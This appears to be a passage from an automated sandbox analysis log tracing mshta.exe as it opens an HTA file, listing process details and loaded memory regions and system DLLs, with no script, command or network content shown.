# Flog Txt Version 1
# Analyzer Version: 2.2.0
# Analyzer Build Date: Feb 8 2018 15:49:39
# Log Creation Date: 15.02.2018 18:28:44.331
Process:
id = "1"
image_name = "mshta.exe"
filename = "c:\\windows\\system32\\mshta.exe"
page_root = "0x24e25000"
os_pid = "0x700"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x0"
cmd_line = "\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\" "
cur_dir = "C:\\Windows\\system32\\"
os_username = "LHNIWSJ\\CIiHmnxMn6Ps"
os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2
start_va = 0xb8a88f0000
end_va = 0xb8a890ffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a88f0000"
filename = ""
Region:
id = 3
start_va = 0xb8a8910000
end_va = 0xb8a8923fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8910000"
filename = ""
Region:
id = 4
start_va = 0xb8a8930000
end_va = 0xb8a8a2ffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8930000"
filename = ""
Region:
id = 5
start_va = 0xb8a8a30000
end_va = 0xb8a8a33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8a30000"
filename = ""
Region:
id = 6
start_va = 0xb8a8a40000
end_va = 0xb8a8a40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8a40000"
filename = ""
Region:
id = 7
start_va = 0xb8a8a50000
end_va = 0xb8a8a51fff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8a50000"
filename = ""
Region:
id = 8
start_va = 0x7df5ffa50000
end_va = 0x7ff5ffa4ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffa50000"
filename = ""
Region:
id = 9
start_va = 0x7ff7229a0000
end_va = 0x7ff7229c2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff7229a0000"
filename = ""
Region:
id = 10
start_va = 0x7ff7229c5000
end_va = 0x7ff7229c5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7229c5000"
filename = ""
Region:
id = 11
start_va = 0x7ff7229ce000
end_va = 0x7ff7229cffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7229ce000"
filename = ""
Region:
id = 12
start_va = 0x7ff7237f0000
end_va = 0x7ff7237f7fff
entry_point = 0x7ff7237f0000
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")
Region:
id = 13
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 153
start_va = 0xb8a8c10000
end_va = 0xb8a8d0ffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8c10000"
filename = ""
Region:
id = 154
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 155
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 156
start_va = 0xb8a88f0000
end_va = 0xb8a88fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a88f0000"
filename = ""
Region:
id = 157
start_va = 0xb8a8a60000
end_va = 0xb8a8b1dfff
entry_point = 0xb8a8a60000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 158
start_va = 0xb8a8d10000
end_va = 0xb8a8e0ffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8d10000"
filename = ""
Region:
id = 159
start_va = 0x7ff7228a0000
end_va = 0x7ff72299ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff7228a0000"
filename = ""
Region:
id = 160
start_va = 0x7ff7229cc000
end_va = 0x7ff7229cdfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7229cc000"
filename = ""
Region:
id = 161
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 162
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 163
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 164
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 165
start_va = 0xb8a8900000
end_va = 0xb8a8906fff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8900000"
filename = ""
Region:
id = 166
start_va = 0xb8a8ff0000
end_va = 0xb8a8ffffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8ff0000"
filename = ""
Region:
id = 167
start_va = 0x7ffb2bea0000
end_va = 0x7ffb2beaffff
entry_point = 0x7ffb2bea0000
region_type = mapped_file
name = "wldp.dll"
filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll")
Region:
id = 168
start_va = 0x7ffb3a630000
end_va = 0x7ffb3a7f0fff
entry_point = 0x7ffb3a630000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 169
start_va = 0x7ffb39d40000
end_va = 0x7ffb39d50fff
entry_point = 0x7ffb39d40000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 170
start_va = 0xb8a8b20000
end_va = 0xb8a8b26fff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8b20000"
filename = ""
Region:
id = 171
start_va = 0x7ffb3a460000
end_va = 0x7ffb3a4b3fff
entry_point = 0x7ffb3a460000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 172
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 173
start_va = 0x7ffb223a0000
end_va = 0x7ffb23b28fff
entry_point = 0x7ffb223a0000
region_type = mapped_file
name = "mshtml.dll"
filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")
Region:
id = 174
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 175
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 176
start_va = 0x7ffb31aa0000
end_va = 0x7ffb31e15fff
entry_point = 0x7ffb31aa0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 177
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 178
start_va = 0x7ffb3a570000
end_va = 0x7ffb3a622fff
entry_point = 0x7ffb3a570000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 179
start_va = 0xb8a8b30000
end_va = 0xb8a8b63fff
entry_point = 0xb8a8b30000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 180
start_va = 0xb8a8e10000
end_va = 0xb8a8f97fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8e10000"
filename = ""
Region:
id = 181
start_va = 0x7ffb3c290000
end_va = 0x7ffb3c2c5fff
entry_point = 0x7ffb3c290000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 182
start_va = 0x7ffb3d020000
end_va = 0x7ffb3d17bfff
entry_point = 0x7ffb3d020000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 183
start_va = 0xb8a9000000
end_va = 0xb8a90fffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a9000000"
filename = ""
Region:
id = 184
start_va = 0xb8a9100000
end_va = 0xb8a9280fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a9100000"
filename = ""
Region:
id = 185
start_va = 0xb8a9290000
end_va = 0xb8aa68ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a9290000"
filename = ""
Region:
id = 186
start_va = 0x7ff7229ca000
end_va = 0x7ff7229cbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7229ca000"
filename = ""
Region:
id = 187
start_va = 0xb8a8b30000
end_va = 0xb8a8b30fff
entry_point = 0xb8a8b30000
region_type = mapped_file
name = "mshta.exe.mui"
filename = "\\Windows\\System32\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\mshta.exe.mui")
Region:
id = 188
start_va = 0xb8a8b40000
end_va = 0xb8a8b40fff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8b40000"
filename = ""
Region:
id = 189
start_va = 0xb8a8b50000
end_va = 0xb8a8b50fff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8b50000"
filename = ""
Region:
id = 190
start_va = 0xb8aa690000
end_va = 0xb8aa9c6fff
entry_point = 0xb8aa690000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 191
start_va = 0xb8aa9d0000
end_va = 0xc0aa9cffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8aa9d0000"
filename = ""
Region:
id = 192
start_va = 0xc0aa9d0000
end_va = 0xc0aaacffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aa9d0000"
filename = ""
Region:
id = 193
start_va = 0xb8a8b60000
end_va = 0xb8a8b7ffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8b60000"
filename = ""
Region:
id = 194
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 195
start_va = 0x7ffb2ea50000
end_va = 0x7ffb2ebe6fff
entry_point = 0x7ffb2ea50000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 196
start_va = 0x7ffb3a9f0000
end_va = 0x7ffb3aa40fff
entry_point = 0x7ffb3a9f0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 197
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 198
start_va = 0xc0aaad0000
end_va = 0xc0aabeffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aaad0000"
filename = ""
Region:
id = 199
start_va = 0xc0aaad0000
end_va = 0xc0aabcffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aaad0000"
filename = ""
Region:
id = 200
start_va = 0xc0aabe0000
end_va = 0xc0aabeffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aabe0000"
filename = ""
Region:
id = 201
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 202
start_va = 0xb8a8b80000
end_va = 0xb8a8b80fff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8b80000"
filename = ""
Region:
id = 203
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 204
start_va = 0xc0aabf0000
end_va = 0xc0aacacfff
entry_point = 0xc0aabf0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 205
start_va = 0xc0aabf0000
end_va = 0xc0aacc5fff
entry_point = 0xc0aabf0000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 206
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 207
start_va = 0x7ffb38610000
end_va = 0x7ffb386a5fff
entry_point = 0x7ffb38610000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 208
start_va = 0xc0aabf0000
end_va = 0xc0aacfffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aabf0000"
filename = ""
Region:
id = 209
start_va = 0xb8a8b90000
end_va = 0xb8a8b90fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8b90000"
filename = ""
Region:
id = 210
start_va = 0xc0aabf0000
end_va = 0xc0aaca7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0aabf0000"
filename = ""
Region:
id = 211
start_va = 0xc0aacf0000
end_va = 0xc0aacfffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aacf0000"
filename = ""
Region:
id = 212
start_va = 0xb8a8b90000
end_va = 0xb8a8b93fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8b90000"
filename = ""
Region:
id = 213
start_va = 0x7ffb37f40000
end_va = 0x7ffb37f61fff
entry_point = 0x7ffb37f40000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 214
start_va = 0xb8a8ba0000
end_va = 0xb8a8ba6fff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8ba0000"
filename = ""
Region:
id = 215
start_va = 0xb8a8bb0000
end_va = 0xb8a8bb0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8bb0000"
filename = ""
Region:
id = 216
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 217
start_va = 0xb8a8bc0000
end_va = 0xb8a8bc0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8bc0000"
filename = ""
Region:
id = 218
start_va = 0xb8a8bd0000
end_va = 0xb8a8bd0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8bd0000"
filename = ""
Region:
id = 219
start_va = 0xb8a8be0000
end_va = 0xb8a8be0fff
entry_point = 0xb8a8be0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 220
start_va = 0xb8a8bf0000
end_va = 0xb8a8bf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8bf0000"
filename = ""
Region:
id = 221
start_va = 0x7ffb34cc0000
end_va = 0x7ffb34f33fff
entry_point = 0x7ffb34cc0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll")
Region:
id = 222
start_va = 0xb8a8be0000
end_va = 0xb8a8be0fff
entry_point = 0xb8a8be0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 223
start_va = 0xb8a8c00000
end_va = 0xb8a8c01fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8c00000"
filename = ""
Region:
id = 224
start_va = 0xb8a8fa0000
end_va = 0xb8a8feffff
entry_point = 0x0
region_type = private
name = "private_0x000000b8a8fa0000"
filename = ""
Region:
id = 225
start_va = 0x7ff7229c8000
end_va = 0x7ff7229c9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7229c8000"
filename = ""
Region:
id = 226
start_va = 0x7ffb39960000
end_va = 0x7ffb3998bfff
entry_point = 0x7ffb39960000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 227
start_va = 0xb8a8be0000
end_va = 0xb8a8be0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000b8a8be0000"
filename = ""
Region:
id = 228
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 229
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 230
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 231
start_va = 0x7ffb39de0000
end_va = 0x7ffb3a407fff
entry_point = 0x7ffb39de0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 232
start_va = 0xc0aabd0000
end_va = 0xc0aabd0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0aabd0000"
filename = ""
Region:
id = 233
start_va = 0x7ffb3aa50000
end_va = 0x7ffb3bf74fff
entry_point = 0x7ffb3aa50000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 234
start_va = 0xc0aad00000
end_va = 0xc0aadfffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aad00000"
filename = ""
Region:
id = 235
start_va = 0x7ff7229c6000
end_va = 0x7ff7229c7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7229c6000"
filename = ""
Region:
id = 236
start_va = 0x7ffb26100000
end_va = 0x7ffb2610ffff
entry_point = 0x7ffb26100000
region_type = mapped_file
name = "msimtf.dll"
filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll")
Region:
id = 237
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 238
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 239
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 240
start_va = 0xc0aae00000
end_va = 0xc0aaefffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aae00000"
filename = ""
Region:
id = 241
start_va = 0x7ff7229c3000
end_va = 0x7ff7229c4fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7229c3000"
filename = ""
Region:
id = 242
start_va = 0xc0aacb0000
end_va = 0xc0aacb0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0aacb0000"
filename = ""
Region:
id = 243
start_va = 0xc0aaf00000
end_va = 0xc0aaffffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0aaf00000"
filename = ""
Region:
id = 244
start_va = 0xc0ab000000
end_va = 0xc0ab0fffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ab000000"
filename = ""
Region:
id = 245
start_va = 0x7ff72289c000
end_va = 0x7ff72289dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff72289c000"
filename = ""
Region:
id = 246
start_va = 0x7ff72289e000
end_va = 0x7ff72289ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff72289e000"
filename = ""
Region:
id = 247
start_va = 0xc0aacc0000
end_va = 0xc0aacc0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0aacc0000"
filename = ""
Region:
id = 248
start_va = 0x7ffb37bf0000
end_va = 0x7ffb37c8bfff
entry_point = 0x7ffb37bf0000
region_type = mapped_file
name = "dxgi.dll"
filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")
Region:
id = 249
start_va = 0x7ffb38970000
end_va = 0x7ffb38997fff
entry_point = 0x7ffb38970000
region_type = mapped_file
name = "rmclient.dll"
filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll")
Region:
id = 250
start_va = 0xc0aacd0000
end_va = 0xc0aacd0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0aacd0000"
filename = ""
Region:
id = 251
start_va = 0xc0ab100000
end_va = 0xc0ab1fffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ab100000"
filename = ""
Region:
id = 252
start_va = 0x7ffb2cef0000
end_va = 0x7ffb2cf58fff
entry_point = 0x7ffb2cef0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 253
start_va = 0xc0ab200000
end_va = 0xc0ab2fffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ab200000"
filename = ""
Region:
id = 254
start_va = 0xc0ab300000
end_va = 0xc0ab3fffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ab300000"
filename = ""
Region:
id = 255
start_va = 0x7ff722898000
end_va = 0x7ff722899fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff722898000"
filename = ""
Region:
id = 256
start_va = 0x7ff72289a000
end_va = 0x7ff72289bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff72289a000"
filename = ""
Region:
id = 257
start_va = 0xc0aacd0000
end_va = 0xc0aacd1fff
entry_point = 0xc0aacd0000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 258
start_va = 0x7ffb39c00000
end_va = 0x7ffb39c97fff
entry_point = 0x7ffb39c00000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 259
start_va = 0xc0aace0000
end_va = 0xc0aace0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0aace0000"
filename = ""
Region:
id = 260
start_va = 0xc0ab400000
end_va = 0xc0ab43afff
entry_point = 0xc0ab400000
region_type = mapped_file
name = "mshtml.dll.mui"
filename = "\\Windows\\System32\\en-US\\mshtml.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mshtml.dll.mui")
Region:
id = 261
start_va = 0x7ffb2cea0000
end_va = 0x7ffb2cee5fff
entry_point = 0x7ffb2cea0000
region_type = mapped_file
name = "dataexchange.dll"
filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll")
Region:
id = 262
start_va = 0x7ffb355d0000
end_va = 0x7ffb35b14fff
entry_point = 0x7ffb355d0000
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")
Region:
id = 263
start_va = 0x7ffb37c90000
end_va = 0x7ffb37f32fff
entry_point = 0x7ffb37c90000
region_type = mapped_file
name = "d3d11.dll"
filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll")
Region:
id = 264
start_va = 0x7ffb381a0000
end_va = 0x7ffb38270fff
entry_point = 0x7ffb381a0000
region_type = mapped_file
name = "dcomp.dll"
filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll")
Region:
id = 265
start_va = 0x7ffb387f0000
end_va = 0x7ffb388ddfff
entry_point = 0x7ffb387f0000
region_type = mapped_file
name = "twinapi.appcore.dll"
filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")
Region:
id = 266
start_va = 0x7ffb39350000
end_va = 0x7ffb3936efff
entry_point = 0x7ffb39350000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 267
start_va = 0xc0aace0000
end_va = 0xc0aaceffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0aace0000"
filename = ""
Region:
id = 268
start_va = 0x7ffb250d0000
end_va = 0x7ffb25161fff
entry_point = 0x7ffb250d0000
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 269
start_va = 0x7ffb30c90000
end_va = 0x7ffb30c9ffff
entry_point = 0x7ffb30c90000
region_type = mapped_file
name = "amsi.dll"
filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll")
Region:
id = 270
start_va = 0x7ffb2dd10000
end_va = 0x7ffb2dd2cfff
entry_point = 0x7ffb2dd10000
region_type = mapped_file
name = "mpoav.dll"
filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll")
Region:
id = 271
start_va = 0x7ffb318d0000
end_va = 0x7ffb318d9fff
entry_point = 0x7ffb318d0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 272
